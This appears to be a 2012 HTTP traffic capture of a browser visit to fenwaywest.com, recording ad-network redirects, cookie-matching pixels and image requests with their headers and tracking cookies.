GET /meta?_o=179638&amp;_t=dm&amp;ssv_p=cw&amp;ssv_u=NE-00000002579495986 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: X1ID=NE-00000002579495986
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 18 Nov 2012 01:30:45 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Content-Length: 0
Pragma: no-cache
Set-Cookie: 31041217-B31041253=2|31041261|0|0|0|31041233|31041230|-1; domain=.ru4.com; path=/ O179638=0@0@0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT C31041217=0@0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-2010 12:00:00 GMT
Location: http://m.xp1.ru4.com/activity?_o=62795&amp;_t=cm_bk_udc
GET /activity?_o=62795&_t=cm_bk_udc HTTP/1.1

Host: m.xp1.ru4.com
GET /activity?_o=62795&amp;_t=cm_bk_udc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: X1ID=NE-00000002579495986; 31041217-B31041253=2|31041261|0|0|0|31041233|31041230|-1
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 18 Nov 2012 01:30:45 GMT
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NON DSP COR PSAa OUR STP UNI&quot;
Pragma: no-cache
Location: http://tags.bluekai.com/site/2751?id=NE-00000002579495986
Content-Length: 0
GET /track/cmf/contextweb HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: private,no-cache, must-revalidate
Date: Sun, 18 Nov 2012 01:30:44 GMT
Location: http://match.adsrvr.org/track/cmb/contextweb?
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661; domain=.adsrvr.org; expires=Mon, 18-Nov-2013 01:30:45 GMT; path=/ TDCPM=CAEYBSgCMgsItu32o8bTiTAQBQ==; domain=.adsrvr.org; expires=Mon, 18-Nov-2013 01:30:45 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 121
Connection: keep-alive
GET /track/cmb/contextweb? HTTP/1.1

Host: match.adsrvr.org

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: TDID=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661; TDCPM=CAEYBSgCMgsItu32o8bTiTAQBQ==
HTTP/1.1 302 Found

Content-Type: text/html
Cache-Control: private,no-cache, must-revalidate
Date: Sun, 18 Nov 2012 01:30:44 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&amp;pid=534301&amp;ev=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;
Pragma: no-cache
Server: Microsoft-IIS/7.5
Set-Cookie: TDID=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661; domain=.adsrvr.org; expires=Mon, 18-Nov-2013 01:30:45 GMT; path=/ TDCPM=CAESGQoKY29udGV4dHdlYhILCLj02/av04kwEAUYBSABKAIyCwi27fajxtOJMBAF; domain=.adsrvr.org; expires=Mon, 18-Nov-2013 01:30:45 GMT; path=/
X-AspNet-Version: 4.0.30319
Content-Length: 213
Connection: keep-alive
GET /PropertyAssets/ArticleImages/b80a6b0f685bdee9fd847d6222b37ffa_72e1255182e32fecbb0f2af51f268f4f.PNG HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; urlHistory=387876:1,388817:1,109485:1,12084:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Sat, 17 Nov 2012 10:45:07 GMT
Accept-Ranges: bytes
Etag: &quot;36facf9bb0c4cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:29 GMT
Content-Length: 33406
GET /bh/rtset?do=add&pid=534301&ev=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661 HTTP/1.1

Host: bh.contextweb.com
GET /bh/rtset?do=add&amp;pid=534301&amp;ev=22f88a08-e2e1-46da-a1e0-ae6bcb5f1661 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: C2W4=3hj8VJekE1xLFEu52vJsr0gR__DD7av_eKsLGmaFwbkP3DUjJz8gRIA; cw=cw; 66902_160X600__POSUNKNOWNXUNKNOWN=1353202367221; V=A4M4pJeeQdJ7; vf=2; wf=0; pb_rtb_ev=2-530731..0.0.1353202242915|535461.3788424827722360895.0.0.1353202243723|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301..0.0.1353202242915|535393..0.0.1353202242915|537085..0.0.1353202242915|541254..0.0.1353202242915|536088..0.0.1353202242915|543921..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|543604..0.0.1353202242915|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915
HTTP/1.1 200 OK

Content-Type: image/gif;charset=ISO-8859-1
Cache-Control: private, max-age=0, no-cache, no-store
Content-Language: en-US
CW-Server: ip-10-84-141-75
Date: Sun, 18 Nov 2012 01:30:44 GMT
Expires: -1
P3P: policyref=&quot;/bh/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Server: GlassFish v3
Set-Cookie: V=A4M4pJeeQdJ7; Domain=.contextweb.com; Expires=Wed, 13-Nov-2013 01:30:45 GMT; Path=/ pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088..0.0.1353202242915|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583..0.0.1353202242915|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:45 GMT; Path=/
Content-Length: 49
Connection: keep-alive
GET /imp?anmember=514&anprice=100&Z=300x250&s=1651067&r=0&_salt=420036788&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php&SIG=10v5rpf70;x-cookie=2trh5u18ntrv5&o=3&f=pg HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=100&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=420036788&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php&amp;SIG=10v5rpf70;x-cookie=2trh5u18ntrv5&amp;o=3&amp;f=pg HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:45 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor1369.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; path=/; expires=Tue, 18-Dec-2012 01:30:45 GMT RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:45 GMT
Expires: Sun, 18 Nov 2012 01:30:45 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /imp?anmember=514&anprice=50&Z=160x600&s=653070&r=0&_salt=1916686269&u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&B=1&SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&o=3&f=b4 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?anmember=514&amp;anprice=50&amp;Z=160x600&amp;s=653070&amp;r=0&amp;_salt=1916686269&amp;u=http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2FBackupTags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;u=http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html&amp;B=1&amp;SIG=10vogoqtf;x-cookie=rqryiwy8ntrv5&amp;o=3&amp;f=b4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:45 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0325.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: BX=edelvjl8agei5&amp;b=3&amp;s=o4&amp;t=322; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT uid=uid=92f26cde-311f-11e2-a142-bbad2ad2c03b&amp;_hmacv=1&amp;_salt=2720946584&amp;_keyid=k1&amp;_hmac=3c0ee2316249c3dd4931734867166b0529c5ee17; path=/; expires=Tue, 18-Dec-2012 01:30:45 GMT RMBX=edelvjl8agei5&amp;b=3&amp;s=o4&amp;t=322; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:45 GMT
Expires: Sun, 18 Nov 2012 01:30:45 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /PropertyAssets/ArticleImages/0470efce6f44155aa8844d74818ecbcc_922ba3918b3b628b0c6f4008f602718c.jpg HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; urlHistory=387876:1,388817:1,109485:1,12084:1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 24 May 2012 18:27:32 GMT
Accept-Ranges: bytes
Etag: &quot;c506ee2da39cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:30 GMT
Content-Length: 11550
GET /site/2751?id=NE-00000002579495986 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
Cookie: bkc=KJynas5QYelWhmOL+uv9ARsO/He/dfQBk4XKMHdeyQe7zl/h1s0qpLeQYmxpxwZkDNc8YVCXAeTR4yIxF0rRYRUwzQCPFk6JkxI0cXRc9OLO/VA=; bklc=50a83a43; bko=; bkp1=; bkst=KJhMR5Mehze9pkYSk8tUU8f7SnDi999ooyPP; bku=F9G99WWb3aevIyWd; bkw5=; bkdc=snv
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:45 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bkc=KJpqpXU9zesRizcPSAD9/y1eylTQ7d1x9ygdkYT3wTRayxXDjt9/wzEWT/pWdfQBk4XKMxdueIBp9LlqBotOyHc/jTe0ubKiXCwxIYO21wTK/cXU6wl/4Jje3wn+u3CXAw6ywQ9vqYtN; expires=Fri, 17-May-2013 01:30:45 GMT; path=/; domain=.bluekai.com bklc=50a83a45; expires=Fri, 17-May-2013 01:30:45 GMT; path=/; domain=.bluekai.com bkst=KJhMR5Mehze9pkYSk8tUU8f7SnDiQ/PCwNO/C1cwP5z99Gh1puNBnW6+nzhzQ4/9n+znlx==; expires=Fri, 17-May-2013 01:30:45 GMT; path=/; domain=.bluekai.com bkdc=snv; expires=Tue, 18-Dec-2012 01:30:45 GMT; path=/; domain=.bluekai.com
BK-Server: 92a0
Content-Length: 62
GET /PropertyAssets/ArticleImages/70ea265eb14964beddaf244fdacc9702_72e1255182e32fecbb0f2af51f268f4f.PNG HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; urlHistory=387876:1,388817:1,109485:1,12084:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Sat, 17 Nov 2012 13:26:08 GMT
Accept-Ranges: bytes
Etag: &quot;7067b41ac7c4cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:29 GMT
Content-Length: 33406
GET /PropertyAssets/ArticleImages/4652491d3f5e96e573e1faaed588ed70_922ba3918b3b628b0c6f4008f602718c.jpg HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; urlHistory=387876:1,388817:1,109485:1,12084:1
HTTP/1.1 200 OK

Content-Type: image/jpeg
Last-Modified: Thu, 01 Nov 2012 21:15:01 GMT
Accept-Ranges: bytes
Etag: &quot;84ae4af475b8cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:29 GMT
Content-Length: 13433
GET /Images/c_ad_logo.png HTTP/1.1

Host: api.content.ad

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: ASP.NET_SessionId=nbbeqxqweaiamlkgma2i5smc; urlHistory=387876:1,388817:1,109485:1,12084:1
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 02 Aug 2012 00:04:21 GMT
Accept-Ranges: bytes
Etag: &quot;b5a81a5e4270cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 18 Nov 2012 01:29:29 GMT
Content-Length: 8598
GET /iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D420036788%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D1651067,92efcc18-311f-11e2-a19f-73f8a8b88e6f,1353202245347 HTTP/1.1

Host: ad.yieldmanager.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: testbounce=testing; BX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322; uid=uid=92eeb846-311f-11e2-9d59-57072c508a64&amp;_hmacv=1&amp;_salt=2599266553&amp;_keyid=k1&amp;_hmac=0787c7ef74949d47565796432b69ddf9ee7dc8a9; RMBX=2geu5h18agei5&amp;b=3&amp;s=ct&amp;t=322
HTTP/1.1 200 OK

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:45 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor1066.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sun, 18 Nov 2012 01:30:45 GMT
Expires: Sun, 18 Nov 2012 01:30:45 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /pixel?google_nid=appnexus1&google_sc&google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

Host: cm.g.doubleclick.net
GET /pixel?google_nid=appnexus1&amp;google_sc&amp;google_hm=NTg1ODcyMTg1OTQyNjc4MTg1Ng%3D%3D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Location: http://adx.adnxs.com/mapuid?member=181&amp;user=
Date: Sun, 18 Nov 2012 01:30:46 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Server: Cookie Matcher
Content-Length: 245
X-XSS-Protection: 1; mode=block
GET /m/cw HTTP/1.1

Host: cw-m.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=93750fa4-311f-11e2-95aa-0025900e0834; Domain=chango.com; expires=Wed, 16 Nov 2022 01:30:46 GMT; Path=/
Connection: close
GET /templates/yoo_bigeasy/images/layout_separator.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/layout.css
Cookie: __qca=P0-1017690683-1353202236609; cto_rtt=; UnicaNIODID=LHSBVeW0yKx-XzFAqs9; __utma=54302783.284014554.1353202243.1353202243.1353202243.1; __utmb=54302783.1.9.1353202243; __utmc=54302783; __utmz=54302783.1353202243.1.1.utmcsr=shinynylonarts.com|utmccn=(referral)|utmcmd=referral|utmcct=/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:19:52 GMT
Etag: &quot;eccb40-61-4c387593cca00&quot;
Accept-Ranges: bytes
Content-Length: 97
Keep-Alive: timeout=5, max=492
Connection: Keep-Alive
GET /mapuid?member=181&user= HTTP/1.1

Host: adx.adnxs.com
GET /mapuid?member=181&amp;user= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSmKI[iYaGso%EUxav^(Q-FbEN!/vP[bvo8f?UWmn&lt;7n; sess=1; icu=ChII64YEEAoYAiACKAIwxPSghQUQxPSghQUYAQ..; acb101605=![nC'XI()vE0+e54(v&gt;WMqfR+?enc=09LS0tLS4j8AAAAAAADgPwAAAAAAAOA_oehwY2kW4z-uEcE4uHTmP9RPlHBhqX1RoArzhH1cTlFDOqhQAAAAAKyWCAACAgAANQEAAAIAAABb7zEA51gBAAAAAQBVU0QAVVNEAKAAWAIvmQAADEoBAgUCAQUAAIIAJCI4EgAAAAA.&amp;tt_code=653070&amp;cnd=%21FCe48wiKeRDb3scBGAAg57EFMAA4r7IGQABItQJQrK0iWABg2AZoAHACeKIQgAG-CogB6AKQAQGYAQGgAQGoAQOwAQC5Aa8j6pa3dOY_wQGvI-qWt3TmP8kBlC84yfTw7T_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+3338%2C+1353202243%29%3Buf%28%27r%27%2C+3272539%2C+1353202243%29%3Bppv%282932%2C+%275872035725126684628%27%2C+1353202243%2C+1354411843%2C+15498%2C+88295%2C+0%2C+0%2C+1209600%29%3B&amp;ccd=%21cgWdLAiKeRDb3scBGOexBSAA&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; 